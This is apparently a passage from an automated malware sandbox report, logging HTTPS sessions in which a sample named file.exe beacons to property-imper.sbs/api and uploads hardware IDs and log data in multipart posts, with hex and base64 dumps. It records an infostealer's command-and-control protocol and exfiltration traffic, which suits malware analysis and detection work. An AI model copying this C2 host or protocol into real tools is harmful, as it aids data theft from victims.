                                                                                                                                                                                        Data Ascii: 0.5MZJ|UQg%Y%p"8(6%r5GiqKt`q]:H<QW3P9 r#rQ-Z47Z"M{l`V|=:\}P{w~`{+h)NKJ7"Oz9*tdX-,0\{|?sh7sCN3N;&"E"lEt}(}


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        0192.168.2.549704104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:03 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                        2024-11-24 01:13:04 UTC1011INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:04 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=8h50f2u7687d33v6t0rf2tqeel; expires=Wed, 19-Mar-2025 18:59:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vpH0qLtm81JEGdWV4LOyOsFEAHJDZkUquWNkXNhL6sPZQr8JVzspWV6FnrqvWoUcqNFHN9j%2BsvC5UIgMk7NfIio1QHfaQh%2F5luvQSSltNO4cedyOwDMiCh2BKVreWxyvTbBxJO8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7588c71c804239-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1812538&cwnd=227&unsent_bytes=0&cid=193055b2519abce4&ts=723&x=0"
                                                                                                                                                                                        2024-11-24 01:13:04 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                        2024-11-24 01:13:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.549705104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:05 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 53
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:05 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:06 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=rv19jftid4jkubelh3a48sc9et; expires=Wed, 19-Mar-2025 18:59:45 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bRdVCXgobo1p8ZR%2BILPL%2FOmGzCmnOpZLJHDjtD7N7NUPBUsKZzm7tn%2FOUePo4TQIomVmrNcMXFOcl7rS%2FiRRtA%2Bqv945XvUFs6sK71xj8YtLy%2BvyWr1uimAqXSFLAzh%2BUqQ3l1w%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7588d448a44372-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1733&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=955&delivery_rate=1689814&cwnd=250&unsent_bytes=0&cid=ecfbd3dc54d6e8bb&ts=708&x=0"
                                                                                                                                                                                        2024-11-24 01:13:06 UTC348INData Raw: 34 34 36 63 0d 0a 2f 4d 31 6f 72 4b 6e 78 42 67 75 4a 35 61 70 57 41 73 69 30 4f 66 65 48 56 30 35 76 34 57 65 4e 67 32 6c 77 67 6c 73 48 79 31 4b 48 37 78 36 4f 6b 38 55 71 4b 66 71 41 69 47 78 32 75 73 46 63 32 36 55 32 4b 6b 33 62 41 65 7a 76 47 68 57 75 65 58 47 6d 63 4d 61 72 43 63 44 61 6c 43 6f 70 37 4a 32 49 62 46 6d 7a 6c 6c 79 5a 70 57 31 73 43 6f 73 46 37 4f 38 4c 45 65 6b 30 64 36 63 78 6c 4b 45 50 78 4d 79 53 59 6d 72 6c 69 4d 38 7a 5a 36 6e 65 56 35 37 71 50 79 4e 4e 7a 55 58 6f 2b 55 74 4b 6f 42 5a 69 76 7a 4f 78 72 42 76 48 69 34 77 71 63 4b 75 41 78 48 51 34 36 74 56 63 6c 65 73 78 4b 67 53 4a 44 2b 58 6e 43 68 54 6f 4b 32 36 74 4f 70 53 76 44 4d 58 47 6d 33 5a 6e 37 34 2f 45 4e 57 32 70 6c 68 58 56 34 69 31 73 56 63 4e 57 33 65 49 61 41
                                                                                                                                                                                        Data Ascii: 446c/M1orKnxBguJ5apWAsi0OfeHV05v4WeNg2lwglsHy1KH7x6Ok8UqKfqAiGx2usFc26U2Kk3bAezvGhWueXGmcMarCcDalCop7J2IbFmzllyZpW1sCosF7O8LEek0d6cxlKEPxMySYmrliM8zZ6neV57qPyNNzUXo+UtKoBZivzOxrBvHi4wqcKuAxHQ46tVclesxKgSJD+XnChToK26tOpSvDMXGm3Zn74/ENW2plhXV4i1sVcNW3eIaA
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 62 76 44 4d 44 4b 6e 6d 52 37 34 34 7a 44 4d 58 4b 68 33 31 61 59 35 54 67 6d 41 6f 41 46 36 4f 73 42 48 65 6f 39 61 4b 51 32 6e 71 39 4b 67 49 75 55 66 43 6d 7a 78 2b 73 78 63 4b 33 61 54 64 66 66 64 54 4e 44 6d 6b 58 6f 37 55 74 4b 6f 44 46 67 71 6a 4f 56 6f 41 6e 47 77 49 46 6b 65 2b 32 4b 7a 53 5a 6d 72 39 68 52 6c 76 63 2f 49 67 75 41 44 4f 54 6f 44 68 58 6b 65 53 76 70 4e 34 62 76 55 6f 37 71 6e 6d 39 6c 34 5a 44 49 64 48 2f 6b 7a 78 75 53 36 58 56 30 54 59 63 45 36 2b 41 50 48 4f 34 39 61 61 38 2b 6b 36 41 4d 78 4d 75 55 62 6d 48 6a 68 73 55 2f 62 36 72 54 56 70 48 6a 4f 53 30 49 77 30 75 76 35 68 4e 53 75 48 6c 4c 72 6a 4f 4d 37 54 2f 4e 78 5a 31 6a 66 36 75 59 68 69 30 67 72 64 6f 62 7a 61 55 37 4b 51 4b 52 42 50 33 6b 42 51 44 73 50 47 4f 6b 4d
                                                                                                                                                                                        Data Ascii: bvDMDKnmR744zDMXKh31aY5TgmAoAF6OsBHeo9aKQ2nq9KgIuUfCmzx+sxcK3aTdffdTNDmkXo7UtKoDFgqjOVoAnGwIFke+2KzSZmr9hRlvc/IguADOToDhXkeSvpN4bvUo7qnm9l4ZDIdH/kzxuS6XV0TYcE6+APHO49aa8+k6AMxMuUbmHjhsU/b6rTVpHjOS0Iw0uv5hNSuHlLrjOM7T/NxZ1jf6uYhi0grdobzaU7KQKRBP3kBQDsPGOkM
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 4e 78 5a 31 6a 66 36 75 59 68 69 30 67 72 64 6f 62 7a 61 55 35 4a 51 32 49 44 2b 76 68 44 42 2f 6c 4f 6d 4b 71 50 5a 6d 6c 42 4d 6e 50 6e 32 31 6b 37 59 66 50 4d 47 57 34 30 31 4b 5a 36 58 56 69 54 59 51 64 72 37 6c 4c 50 65 63 76 5a 6f 59 7a 6a 36 5a 4b 30 59 57 4b 4a 47 37 6e 78 35 42 30 5a 36 2f 65 55 4a 50 74 4e 54 34 49 6a 51 37 75 36 77 30 54 37 54 56 6a 71 54 47 65 71 51 62 4f 7a 4a 52 32 65 2b 36 42 32 6a 34 67 35 4a 5a 63 6a 61 56 74 62 44 75 54 45 76 37 33 53 53 66 6a 4e 32 75 75 4a 74 36 77 52 4e 65 4c 6c 47 67 70 73 38 66 44 4e 47 79 74 33 6c 32 52 37 54 6f 6a 42 4a 45 45 34 2b 38 5a 46 65 41 77 61 36 59 38 6c 36 49 4e 77 38 43 5a 61 57 33 73 68 6f 68 36 49 4b 33 4f 47 38 32 6c 41 7a 77 41 6a 79 76 6b 37 51 4a 53 2f 33 64 38 36 54 65 53 37 31
                                                                                                                                                                                        Data Ascii: NxZ1jf6uYhi0grdobzaU5JQ2ID+vhDB/lOmKqPZmlBMnPn21k7YfPMGW401KZ6XViTYQdr7lLPecvZoYzj6ZK0YWKJG7nx5B0Z6/eUJPtNT4IjQ7u6w0T7TVjqTGeqQbOzJR2e+6B2j4g5JZcjaVtbDuTEv73SSfjN2uuJt6wRNeLlGgps8fDNGyt3l2R7TojBJEE4+8ZFeAwa6Y8l6INw8CZaW3shoh6IK3OG82lAzwAjyvk7QJS/3d86TeS71
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 61 6d 62 71 67 38 30 78 5a 4b 33 53 58 5a 71 6c 65 32 77 4b 6d 30 57 33 6f 53 51 31 31 58 74 45 6b 33 43 42 34 52 4f 4f 7a 4a 38 6b 4d 61 75 4c 79 7a 68 6f 70 64 42 53 6d 65 38 38 4a 77 47 49 41 65 50 6f 44 68 54 68 50 47 43 6f 4e 4a 4b 6c 44 4d 33 49 6e 47 74 6d 34 38 65 47 64 47 65 79 6c 67 50 56 77 43 49 6e 41 34 56 46 38 4b 38 53 55 75 63 31 4a 66 46 77 6b 71 59 4d 79 4d 36 66 5a 57 2f 6a 67 73 41 77 59 61 7a 51 57 4a 72 68 4d 43 30 43 68 77 6e 68 36 77 6f 54 37 44 4a 71 6f 6a 58 65 34 55 72 4a 30 39 4d 38 4b 64 71 45 33 69 4e 77 70 70 5a 45 32 2f 78 31 4b 77 48 44 58 61 2f 67 47 52 6a 71 4e 32 43 6d 4e 5a 32 67 44 63 50 4e 6e 32 35 67 34 34 48 48 50 58 4b 70 32 6c 57 53 36 7a 6b 69 41 49 6b 47 34 71 46 46 55 75 63 68 4a 66 46 77 73 71 67 48 34 4d 43
                                                                                                                                                                                        Data Ascii: ambqg80xZK3SXZqle2wKm0W3oSQ11XtEk3CB4ROOzJ8kMauLyzhopdBSme88JwGIAePoDhThPGCoNJKlDM3InGtm48eGdGeylgPVwCInA4VF8K8SUuc1JfFwkqYMyM6fZW/jgsAwYazQWJrhMC0Chwnh6woT7DJqojXe4UrJ09M8KdqE3iNwppZE2/x1KwHDXa/gGRjqN2CmNZ2gDcPNn25g44HHPXKp2lWS6zkiAIkG4qFFUuchJfFwsqgH4MC
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 70 58 61 64 43 37 71 30 55 50 56 76 58 55 61 43 70 4d 56 37 4b 4d 36 42 4f 4d 76 62 71 51 38 33 72 42 45 31 34 75 55 61 43 6d 7a 78 38 34 37 61 61 6e 5a 57 70 7a 70 4f 43 6b 45 68 67 54 70 35 51 45 59 34 44 39 6a 71 44 57 55 72 41 76 45 77 70 52 73 62 75 69 56 69 48 6f 67 72 63 34 62 7a 61 55 63 4b 78 2b 4e 46 61 2f 2b 52 51 75 67 50 6d 6e 70 61 4e 36 72 41 4d 48 50 6c 47 68 76 37 6f 48 46 4e 57 2b 72 31 6c 53 52 37 6a 77 71 44 49 34 41 34 75 55 5a 47 4f 73 32 61 61 41 38 6b 2b 39 45 6a 73 79 4c 4a 44 47 72 74 73 55 36 62 71 33 41 47 34 71 72 4c 47 77 4b 6a 30 57 33 6f 51 6f 65 37 7a 70 71 71 6a 4f 66 70 52 6a 63 78 35 70 73 62 4f 65 4d 78 6a 4a 79 72 4e 6c 53 6c 75 59 38 4b 77 57 50 44 2b 7a 6d 53 31 79 67 50 6e 33 70 61 4e 36 4d 48 64 37 47 30 33 73 6e
                                                                                                                                                                                        Data Ascii: pXadC7q0UPVvXUaCpMV7KM6BOMvbqQ83rBE14uUaCmzx847aanZWpzpOCkEhgTp5QEY4D9jqDWUrAvEwpRsbuiViHogrc4bzaUcKx+NFa/+RQugPmnpaN6rAMHPlGhv7oHFNW+r1lSR7jwqDI4A4uUZGOs2aaA8k+9EjsyLJDGrtsU6bq3AG4qrLGwKj0W3oQoe7zpqqjOfpRjcx5psbOeMxjJyrNlSluY8KwWPD+zmS1ygPn3paN6MHd7G03sn
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 31 6d 72 64 42 56 68 2b 41 7a 49 77 4b 4b 44 4f 76 70 43 42 4c 6b 50 57 4b 73 4d 35 4b 6b 44 63 33 45 6c 32 31 6e 34 6f 69 49 65 69 43 74 7a 68 76 4e 70 52 51 33 44 6f 38 49 72 2f 35 46 43 36 41 2b 61 65 6c 6f 33 71 4d 45 79 38 75 5a 59 6d 33 75 67 63 49 78 59 4b 48 56 56 4a 48 6a 4d 53 4d 4e 69 41 7a 75 35 77 34 59 36 7a 39 6f 71 6a 61 59 37 30 53 4f 7a 49 73 6b 4d 61 75 6e 30 7a 6c 73 72 5a 5a 45 32 2f 78 31 4b 77 48 44 58 61 2f 71 42 78 62 6e 4f 57 69 71 4f 4a 75 72 41 4d 76 4c 6d 33 5a 68 36 34 44 61 4a 6d 43 6a 30 31 65 57 35 54 45 71 42 49 55 47 36 36 46 46 55 75 63 68 4a 66 46 77 73 36 4d 4e 35 38 79 49 4a 48 61 6c 6e 6f 67 7a 62 4f 71 4f 47 35 54 75 50 79 4d 41 67 41 50 73 36 67 34 59 34 54 35 74 70 43 4b 64 6f 41 58 4b 79 35 78 69 62 2b 71 49 7a
                                                                                                                                                                                        Data Ascii: 1mrdBVh+AzIwKKDOvpCBLkPWKsM5KkDc3El21n4oiIeiCtzhvNpRQ3Do8Ir/5FC6A+aelo3qMEy8uZYm3ugcIxYKHVVJHjMSMNiAzu5w4Y6z9oqjaY70SOzIskMaun0zlsrZZE2/x1KwHDXa/qBxbnOWiqOJurAMvLm3Zh64DaJmCj01eW5TEqBIUG66FFUuchJfFws6MN58yIJHalnogzbOqOG5TuPyMAgAPs6g4Y4T5tpCKdoAXKy5xib+qIz
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 56 54 5a 61 69 43 78 49 71 6c 51 2f 6f 38 51 77 46 37 33 6b 72 36 54 2f 65 39 7a 4f 4f 77 70 52 2f 65 50 32 4b 32 44 4d 67 6c 5a 67 62 6a 61 56 74 62 44 69 41 43 2b 48 6d 48 51 4f 74 48 6e 4f 6a 4e 34 36 6f 48 63 47 4c 33 53 52 76 71 39 2b 62 65 69 43 75 78 78 76 4e 74 57 64 33 57 4e 42 53 76 37 4d 55 58 50 6c 35 63 2b 6c 6f 7a 4f 46 4b 33 49 76 4c 4a 43 37 6f 6c 64 6f 79 59 37 7a 56 48 4b 76 62 45 6a 59 41 68 52 4c 2b 33 7a 55 56 2b 6a 52 6a 76 69 48 53 75 67 6e 41 78 5a 52 79 4b 61 58 48 78 33 51 34 6b 35 59 54 31 64 70 37 62 42 58 44 58 61 2f 55 43 42 7a 75 50 6e 4f 34 66 62 6d 31 42 38 6a 63 67 69 51 6e 71 34 47 49 62 44 44 6b 6c 6c 2b 45 70 57 31 38 58 39 68 51 76 4c 5a 62 51 50 39 33 66 4f 6b 6d 33 76 64 59 67 49 75 42 4a 44 47 72 77 4d 73 6d 63 71
                                                                                                                                                                                        Data Ascii: VTZaiCxIqlQ/o8QwF73kr6T/e9zOOwpR/eP2K2DMglZgbjaVtbDiAC+HmHQOtHnOjN46oHcGL3SRvq9+beiCuxxvNtWd3WNBSv7MUXPl5c+lozOFK3IvLJC7oldoyY7zVHKvbEjYAhRL+3zUV+jRjviHSugnAxZRyKaXHx3Q4k5YT1dp7bBXDXa/UCBzuPnO4fbm1B8jcgiQnq4GIbDDkll+EpW18X9hQvLZbQP93fOkm3vdYgIuBJDGrwMsmcq
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 71 33 55 30 54 64 74 46 32 75 49 46 48 4f 63 76 64 4f 51 58 6b 4b 67 4c 32 4e 75 45 61 79 6d 6c 78 38 35 30 4f 50 69 59 47 35 48 30 64 58 52 64 30 56 36 36 73 6c 78 43 73 69 59 72 73 48 43 49 37 31 4b 63 68 64 4e 32 4b 62 50 48 6a 7a 64 79 75 4e 42 59 67 2b 5a 79 45 6a 4f 6b 43 2b 6a 67 48 51 4c 33 4e 69 71 48 42 72 2b 52 4e 4e 76 49 6e 57 70 75 2f 5a 61 49 65 69 43 6c 6c 67 4f 73 70 58 31 73 4d 73 31 46 39 36 46 54 55 74 55 36 61 36 63 33 69 4c 35 48 36 63 57 55 5a 58 2f 37 6b 4d 64 37 54 70 7a 33 47 39 75 6c 4d 32 78 56 30 55 75 76 35 52 70 53 75 47 6b 33 38 6d 58 4e 2b 46 71 63 31 4e 31 39 4b 66 33 48 6b 47 59 75 36 73 51 62 7a 61 56 79 4c 78 2b 52 41 2b 7a 33 43 46 58 65 42 30 4b 6e 4e 35 2b 35 47 73 50 48 73 6d 64 34 34 62 6e 32 49 57 4f 6b 32 46 79
                                                                                                                                                                                        Data Ascii: q3U0TdtF2uIFHOcvdOQXkKgL2NuEaymlx850OPiYG5H0dXRd0V66slxCsiYrsHCI71KchdN2KbPHjzdyuNBYg+ZyEjOkC+jgHQL3NiqHBr+RNNvInWpu/ZaIeiCllgOspX1sMs1F96FTUtU6a6c3iL5H6cWUZX/7kMd7Tpz3G9ulM2xV0Uuv5RpSuGk38mXN+Fqc1N19Kf3HkGYu6sQbzaVyLx+RA+z3CFXeB0KnN5+5GsPHsmd44bn2IWOk2Fy
                                                                                                                                                                                        2024-11-24 01:13:06 UTC1369INData Raw: 41 37 42 4e 4f 4c 6c 48 51 66 6a 4b 57 4b 58 44 72 4f 39 44 64 37 49 30 55 68 75 35 6f 76 32 43 6c 65 37 30 55 76 58 77 7a 59 36 44 73 4e 4c 72 2f 6c 4c 53 71 41 55 64 36 34 67 6e 65 30 6d 79 63 61 66 4a 48 61 6c 6e 6f 67 69 49 50 4b 46 46 64 58 33 64 58 52 4e 78 41 62 39 38 77 30 52 39 6a 6f 69 6c 77 36 7a 76 51 33 65 79 4e 46 56 5a 4f 2b 52 33 54 64 77 72 65 68 6c 75 50 63 79 50 41 37 42 49 4e 57 6a 4f 67 54 6a 4f 57 75 75 63 4e 44 76 45 6f 36 54 30 30 6c 37 37 4a 66 4c 64 6b 57 51 6c 47 71 44 35 6a 55 69 43 73 4d 61 6f 66 68 4c 42 4b 42 68 4e 75 64 77 6a 4f 39 53 6a 6f 79 64 61 57 6a 6f 69 63 73 6d 63 71 7a 56 54 5a 61 69 43 78 49 69 69 41 54 2f 37 42 6f 66 35 43 39 62 6c 78 65 59 71 67 33 77 39 61 52 31 62 76 76 46 37 6a 64 32 71 5a 59 56 31 66 31 31
                                                                                                                                                                                        Data Ascii: A7BNOLlHQfjKWKXDrO9Dd7I0Uhu5ov2Cle70UvXwzY6DsNLr/lLSqAUd64gne0mycafJHalnogiIPKFFdX3dXRNxAb98w0R9joilw6zvQ3eyNFVZO+R3TdwrehluPcyPA7BINWjOgTjOWuucNDvEo6T00l77JfLdkWQlGqD5jUiCsMaofhLBKBhNudwjO9SjoydaWjoicsmcqzVTZaiCxIiiAT/7Bof5C9blxeYqg3w9aR1bvvF7jd2qZYV1f11


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.549706104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:07 UTC275OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=WMKZK5CTM
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 12787
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:07 UTC12787OUTData Raw: 2d 2d 57 4d 4b 5a 4b 35 43 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 57 4d 4b 5a 4b 35 43 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 4d 4b 5a 4b 35 43 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 57 4d 4b 5a 4b 35 43 54 4d 0d 0a 43 6f 6e 74 65 6e
                                                                                                                                                                                        Data Ascii: --WMKZK5CTMContent-Disposition: form-data; name="hwid"604BBA8A1C3882ACD7CBBD6DF28D3732--WMKZK5CTMContent-Disposition: form-data; name="pid"2--WMKZK5CTMContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--WMKZK5CTMConten
                                                                                                                                                                                        2024-11-24 01:13:08 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=bhsn87drr6ludm5k3d8ejdo7mc; expires=Wed, 19-Mar-2025 18:59:47 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOVmkaI%2BOnAJsdYSVogdzaDDw2%2BoWIkRovLXh67JHYDOBjqC0TFxjcTftRknrVs6NfddGZfPcgx56%2FP6%2BasLhZGjZ1h4i8jP%2BmW%2BWmPemXoc0aJiiUCm3nnMv3bdTTYnTDLxDrU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 8e7588e1fede43a9-EWR
                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1869&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2844&recv_bytes=13720&delivery_rate=1555673&cwnd=243&unsent_bytes=0&cid=ec32f4f4d8d9a57f&ts=985&x=0"
                                                                                                                                                                                        2024-11-24 01:13:08 UTC19INData Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
                                                                                                                                                                                        Data Ascii: eok 8.46.123.75
                                                                                                                                                                                        2024-11-24 01:13:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        3192.168.2.549707104.21.33.1164436088C:\Users\user\Desktop\file.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:10 UTC284OUTPOST /api HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=FHGLMLA87BPS5R13O8
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                        Content-Length: 15083
                                                                                                                                                                                        Host: property-imper.sbs
                                                                                                                                                                                        2024-11-24 01:13:10 UTC15083OUTData Raw: 2d 2d 46 48 47 4c 4d 4c 41 38 37 42 50 53 35 52 31 33 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 30 34 42 42 41 38 41 31 43 33 38 38 32 41 43 44 37 43 42 42 44 36 44 46 32 38 44 33 37 33 32 0d 0a 2d 2d 46 48 47 4c 4d 4c 41 38 37 42 50 53 35 52 31 33 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 46 48 47 4c 4d 4c 41 38 37 42 50 53 35 52 31 33 4f 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54
                                                                                                                                                                                        Data Ascii: --FHGLMLA87BPS5R13O8Content-Disposition: form-data; name="hwid"604BBA8A1C3882ACD7CBBD6DF28D3732--FHGLMLA87BPS5R13O8Content-Disposition: form-data; name="pid"2--FHGLMLA87BPS5R13O8Content-Disposition: form-data; name="lid"LOGS11--LiveT
                                                                                                                                                                                        2024-11-24 01:13:11 UTC1021INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:11 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Set-Cookie: PHPSESSID=9vcmlvq3bb7fo4gfnhrs0olqse; expires=Wed, 19-Mar-2025 18:59:49 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                        vary: accept-encoding
